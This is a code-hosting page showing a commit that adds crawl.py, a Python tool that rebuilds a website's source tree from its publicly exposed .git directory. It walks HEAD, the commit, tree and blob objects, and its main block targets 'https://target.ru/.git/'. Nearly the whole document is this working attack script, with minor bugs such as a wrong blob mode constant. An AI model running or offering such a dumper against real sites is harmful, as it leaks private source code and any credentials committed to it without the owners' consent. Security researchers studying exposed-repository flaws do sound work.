• crawl.py

  • Loading...
  • Nika committed 1 year ago
    dcb48bf4
  • crawl.py
    ■ ■ ■ ■ ■ ■
     1 +import binascii
     2 +import os
     3 +import time
     4 +import zlib
     5 +from collections import namedtuple
     6 +from typing import List, Tuple
     7 +from requests import Session
     8 + 
     9 +session = Session()
     10 +ObjTypes = namedtuple("ObjTypes", ("TREE", "BLOB"))
     11 +object_types = ObjTypes("40000", "10644")
     12 + 
     13 + 
     14 +class RemoteGitObject:
     15 + type_: str
     16 + content: bytes
     17 + 
     18 + def __init__(self, url, obj_type=None):
     19 + self.url = url
     20 + self.type_ = obj_type
     21 + self.data_ = session.get(url).content
     22 + self.content = zlib.decompress(self.data_)
     23 + self.content = self.content.split(b'\x00', maxsplit=1)[1]
     24 + 
     25 + def save(self, local_path: str):
     26 + mode = "w"
     27 + content = self.content
     28 + try:
     29 + content = self.content.decode()
     30 + except UnicodeDecodeError:
     31 + mode = "wb"
     32 + with open(local_path, mode) as file:
     33 + file.write(content)
     34 + 
     35 + 
     36 +class RemoteGitTree(RemoteGitObject):
     37 + objects: List[Tuple]
     38 + 
     39 + def __init__(self, url: str, obj_type=object_types.TREE):
     40 + super().__init__(url, obj_type)
     41 + self.objects = self._get_objects()
     42 + 
     43 + def _get_objects(self) -> List[Tuple]:
     44 + objects = []
     45 + objects_content = self.content
     46 + while objects_content:
     47 + obj_type, objects_content = objects_content.split(maxsplit=1)
     48 + obj_name, objects_content = objects_content.split(b'\x00', maxsplit=1)
     49 + obj_hash, objects_content = binascii.hexlify(objects_content[:20]), objects_content[20:]
     50 + objects.append((obj_type.decode(), obj_hash.decode(), obj_name.decode()))
     51 + return objects
     52 + 
     53 + def save(self, local_path: str):
     54 + os.mkdir(local_path)
     55 + 
     56 + 
     57 +class RemoteGitDirectoryCrawler:
     58 + url: str
     59 + current_tree: RemoteGitTree
     60 + 
     61 + def __init__(self, url: str):
     62 + self.url = url[:-1] if url.endswith('/') else url
     63 + self.current_tree = self._get_current_tree()
     64 + 
     65 + def _get_base_url(self, path: str) -> str:
     66 + return f"{self.url}/{path[1:] if path.startswith('/') else path}"
     67 + 
     68 + def _get_current_branch_url(self) -> str:
     69 + resp_txt = session.get(self._get_base_url("HEAD")).text
     70 + return self._get_base_url(resp_txt.split()[1])
     71 + 
     72 + def _get_object_url(self, obj_hash: str) -> str:
     73 + path = f"objects/{obj_hash[:2]}/{obj_hash[2:]}"
     74 + return self._get_base_url(path)
     75 + 
     76 + def _get_current_tree(self) -> RemoteGitTree:
     77 + current_branch_url = self._get_current_branch_url()
     78 + 
     79 + commit_hash = session.get(current_branch_url).text.strip()
     80 + commit_obj = RemoteGitObject(self._get_object_url(commit_hash))
     81 + commit_entries = commit_obj.content.decode("utf-8").split('\n')
     82 + 
     83 + tree_info = commit_entries[0]
     84 + tree_hash = tree_info.split()[-1]
     85 + return RemoteGitTree(self._get_object_url(tree_hash))
     86 + 
     87 + def _crawl_wrapper(self, save_to: str, tree: RemoteGitTree, level=0, exclude: List[str] = None):
     88 + time.sleep(1)
     89 + for type_, hash_, name in tree.objects:
     90 + save_pt = os.path.join(save_to, name)
     91 + 
     92 + if len(ext := name.split('.')) == 2:
     93 + ext = ext[-1]
     94 + if ext in exclude:
     95 + print(f"{' ' * level} excluding: {save_pt}")
     96 + continue
     97 + 
     98 + object_url = self._get_object_url(hash_)
     99 + if type_ == object_types.TREE:
     100 + try:
     101 + tree.save(save_pt)
     102 + except FileExistsError:
     103 + pass
     104 + next_tree = RemoteGitTree(object_url)
     105 + 
     106 + for save_pt, level in self._crawl_wrapper(save_pt, next_tree, level + 1, exclude):
     107 + yield save_pt, level
     108 + continue
     109 + if os.path.exists(save_pt):
     110 + continue
     111 + git_object = RemoteGitObject(object_url, obj_type=type_)
     112 + yield save_pt, level
     113 + git_object.save(save_pt)
     114 + 
     115 + time.sleep(0.3)
     116 + 
     117 + def crawl(self, save_to: str, exclude: List[str] = None):
     118 + for save_pt, level in self._crawl_wrapper(save_to, self.current_tree, exclude=exclude):
     119 + yield save_pt, level
     120 + 
     121 + 
     122 +if __name__ == "__main__":
     123 + target_git_url = "https://target.ru/.git/"
     124 + crawler = RemoteGitDirectoryCrawler(target_git_url)
     125 + for saved_object_pt, dir_level in crawler.crawl(save_to="./target/filesystem/",
     126 + exclude=["jpg", "png", "jpeg", "gif", "ico"]):
     127 + print(f"{' ' * dir_level}saving: {saved_object_pt}")
     128 + print("Done")
     129 + 
Please wait...
Page is in error, reload to recover